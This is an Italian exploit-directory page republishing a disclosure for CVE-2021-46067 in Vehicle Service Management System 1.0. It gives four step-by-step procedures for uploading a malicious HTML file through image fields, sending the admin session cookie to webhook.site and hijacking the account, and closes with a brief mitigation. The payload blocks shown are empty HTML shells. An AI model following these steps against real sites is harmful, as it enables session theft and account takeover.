Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Vehicle-Service-Management-System-Multiple-Cookie-Stealing-Leads-to-Full-Account-Takeover — CVE-2021-46067 - In Vehicle Service Management System 1.0 un attaccante può rubare i cookie portando alla completa compromissione dell'account. | Kitploit
Strumenti/GitHubGitHub/sanupl/vehicle-service-management-system-multiple-cookie-stealing-leads-to-full-account-takeover
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneRed Teaming
GitHubsanupl/vehicle-service-management-system-multiple-cookie-stealing-leads-to-full-account-takeover

Vehicle-Service-Management-System-Multiple-Cookie-Stealing-Leads-to-Full-Account-Takeover

CVE-2021-46067 - In Vehicle Service Management System 1.0 un attaccante può rubare i cookie portando alla completa compromissione dell'account.

Vedi Repository
34 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2021-46067

Titolo dell'exploit: Vehicle Service Management System - 'Multiplo' Furto di Cookie Porta al Completo Dirottamento dell'Account

Autore dell'exploit: SANU P.L

CVE: CVE-2021-46067

CVSS: 9.8 CRITICAL

Riferimenti:

  • https://www.plsanu.com/vehicle-service-management-system-multiple-cookie-stealing-leads-to-full-account-takeover
  • https://nvd.nist.gov/vuln/detail/CVE-2021-46067
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46067
  • Descrizione:

    In Vehicle Service Management System 1.0 un attaccante può rubare i cookie portando al completo dirottamento dell'account.

    1. Vehicle Service Management System - 'MyAccount' (/admin/?page=user)

    Exploit:

    1. Accedi al pannello di amministrazione http://localhost/vehicle_service/admin
    2. Vai alla sezione My Account http://localhost/vehicle_service/admin/?page=user
    3. Genera l'URL del Webhook - https://webhook.site
    4. Copia l'URL univoco del Webhook e incollalo nel codice html qui sotto.

    Payload:

    root@kitploit:~
    <!DOCTYPE html>
    <html>
    <title>Cookie Stealing</title>
    <body>
    
    </body>
    </html>
    
    1. Salva il codice html qui sopra, ad es.: Cookie Stealing.html
    2. Nella sezione My Account inserisci tutti i dettagli richiesti e seleziona il file html nel campo Avatar.
    3. Fai clic sul pulsante Aggiorna.
    4. Apri l'immagine dell'avatar in una nuova scheda e controlla lo stato del Webhook.
    5. Abbiamo ricevuto la richiesta: contiene PHPSESSID.
    6. Copia il valore di PHPSESSID e apri un altro browser.
    7. Visita il pannello di amministrazione http://localhost/vehicle_service/admin
    8. Controlla i valori dei cookie e sostituisci il valore di PHPSESSID con quello copiato.
    9. Ora accedi al pannello di amministrazione http://localhost/vehicle_service/admin
    10. Accesso all'account riuscito. Dirottamento dell'account completato con successo.

    2. Vehicle Service Management System - 'User List' (/admin/?page=user/manage_user)

    Exploit:

    1. Accedi al pannello di amministrazione http://localhost/vehicle_service/admin
    2. Vai alla sezione User List e fai clic sul pulsante Create New.
    3. Genera l'URL del Webhook - https://webhook.site
    4. Copia l'URL univoco del Webhook e incollalo nel codice html qui sotto.

    Payload:

    root@kitploit:~
    <!DOCTYPE html>
    <html>
    <title>Cookie Stealing</title>
    <body>
    
    </body>
    </html>
    
    1. Salva il codice html qui sopra, ad es.: Cookie Stealing.html
    2. Nella sezione Create New User inserisci tutti i dettagli richiesti e seleziona il file html nel campo Avatar.
    3. Fai clic sul pulsante Save.
    4. Apri l'immagine dell'avatar in una nuova scheda e controlla lo stato del Webhook.
    5. Abbiamo ricevuto la richiesta: contiene PHPSESSID.
    6. Copia il valore di PHPSESSID e apri un altro browser.
    7. Visita il pannello di amministrazione http://localhost/vehicle_service/admin
    8. Controlla i valori dei cookie e sostituisci il valore di PHPSESSID con quello copiato.
    9. Ora accedi al pannello di amministrazione http://localhost/vehicle_service/admin
    10. Accesso all'account riuscito. Dirottamento dell'account completato con successo.

    3. Vehicle Service Management System - 'Settings-System Logo' (/admin/?page=system_info)

    Exploit:

    1. Accedi al pannello di amministrazione http://localhost/vehicle_service/admin
    2. Vai alla sezione Settings http://localhost/vehicle_service/admin/?page=system_info
    3. Genera l'URL del Webhook - https://webhook.site
    4. Copia l'URL univoco del Webhook e incollalo nel codice html qui sotto.

    Payload:

    root@kitploit:~
    <!DOCTYPE html>
    <html>
    <title>Cookie Stealing</title>
    <body>
    
    </body>
    </html>
    
    1. Salva il codice html qui sopra, ad es.: Cookie Stealing.html
    2. Nella sezione Settings inserisci tutti i dettagli richiesti e seleziona il file html nel campo System Logo.
    3. Fai clic sul pulsante Aggiorna.
    4. Apri l'immagine System Logo in una nuova scheda e controlla lo stato del Webhook.
    5. Abbiamo ricevuto la richiesta: contiene PHPSESSID.
    6. Copia il valore di PHPSESSID e apri un altro browser.
    7. Visita il pannello di amministrazione http://localhost/vehicle_service/admin
    8. Controlla i valori dei cookie e sostituisci il valore di PHPSESSID con quello copiato.
    9. Ora accedi al pannello di amministrazione http://localhost/vehicle_service/admin
    10. Accesso all'account riuscito. Dirottamento dell'account completato con successo.

    4. Vehicle Service Management System - 'Settings-Website Cover' (/admin/?page=system_info)

    Exploit:

    1. Accedi al pannello di amministrazione http://localhost/vehicle_service/admin
    2. Vai alla sezione Settings http://localhost/vehicle_service/admin/?page=system_info
    3. Genera l'URL del Webhook - https://webhook.site
    4. Copia l'URL univoco del Webhook e incollalo nel codice html qui sotto.

    Payload:

    root@kitploit:~
    <!DOCTYPE html>
    <html>
    <title>Cookie Stealing</title>
    <body>
    
    </body>
    </html>
    
    1. Salva il codice html qui sopra, ad es.: Cookie Stealing.html
    2. Nella sezione Settings inserisci tutti i dettagli richiesti e seleziona il file html nel campo Website Cover.
    3. Fai clic sul pulsante Aggiorna.
    4. Apri l'immagine Website Cover in una nuova scheda e controlla lo stato del Webhook.
    5. Abbiamo ricevuto la richiesta: contiene PHPSESSID.
    6. Copia il valore di PHPSESSID e apri un altro browser.
    7. Visita il pannello di amministrazione http://localhost/vehicle_service/admin
    8. Controlla i valori dei cookie e sostituisci il valore di PHPSESSID con quello copiato.
    9. Ora accedi al pannello di amministrazione http://localhost/vehicle_service/admin
    10. Accesso all'account riuscito. Dirottamento dell'account completato con successo.

    Impatto:

    Un attaccante carica un file html dannoso che reindirizza a un sito web di terze parti e i cookie vengono esposti nella richiesta. Ciò porta al completo dirottamento dell'account.

    Mitigazione:

    Si consiglia di convalidare la funzionalità di upload dei file e di eseguire controlli secondari nella sessione.

    Scarica lo strumento